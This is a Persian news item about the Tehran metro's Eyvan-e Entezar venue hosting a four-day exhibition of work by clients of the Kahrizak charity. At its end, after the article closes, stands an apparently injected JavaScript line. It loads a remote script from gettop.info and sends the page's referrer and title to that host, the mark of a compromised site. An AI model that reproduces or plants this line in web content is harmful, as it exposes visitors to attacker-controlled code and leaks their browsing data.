کد خبر: 91376تاريخ انتشار : ۱۷:۴۴:۲۴ - چهارشنبه ۲۲ شهریور ۱۳۹۶

ایوان انتظار میزبان مددجویان موسسه خیریه کهریزک شد

ایوان انتظار میزبان مددجویان موسسه خیریه کهریزک شد


معاون فرهنگی و اجتماعی شرکت بهره برداری مترو تهران و حومه از برگزاری نمایشگاه توانمندی خدمات موسسه خیریه کهریزک در ایوان انتظار میدان حضرت ولی عصر (ع) خبر داد.

به گزارش سادس، محمد بنی حسن گفت: در راستای انجام مسئولیت‌های اجتماعی و همچنین تعامل و مشارکت با سازمان‌ها و نهادهای مردمی، نمایشگاه توانمندی خدمات موسسه خیریه کهریزک با مشارکت این موسسه از ۲۱ شهریورماه به مدت چهار روز برپا شده است.

وی  افزود:‌ شناخت عموم مردم از موسسه کهریزک بیشتر به عنوان یک موسسه خیریه است؛ این در حالی است که ظرفیت‌ها و توانمندی‌های زیادی از لحاظ کارآفرینی و خلاقیت مددجویان در این مجموعه وجود دارد.

معاون فرهنگی اجتماعی شرکت بهره برداری مترو تهران با اشاره به اینکه ایوان انتظار نیز به عنوان یک سازه فرهنگی محل مناسبی برای شناخت و معرفی توانمندی مددجویان موسسه های خیریه است، تصریح کرد: به همین منظور با برپایی نمایشگاه توانمندی خدمات مددجویان موسسه کهریزک نسبت به معرفی ظرفیت های این موسسه اقدام شده است ضمن آنکه در کنار برپایی این نمایشگاه ویژه برنامه ای با حضور گروه های مختلف هنری برگزار می شود.

بر اساس گزارش مدیریت ارتباطات و امور بین الملل شرکت بهره بردای راه آهن شهری تهران و حومه، معاون فرهنگی اجتماعی شرکت بهره برداری مترو تهران گفت: مسافران می‌توانند از ساعت ۱۷ الی ۲۱ از این نمایشگاه بازدید کنند.

انتهای پیام

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
ارسال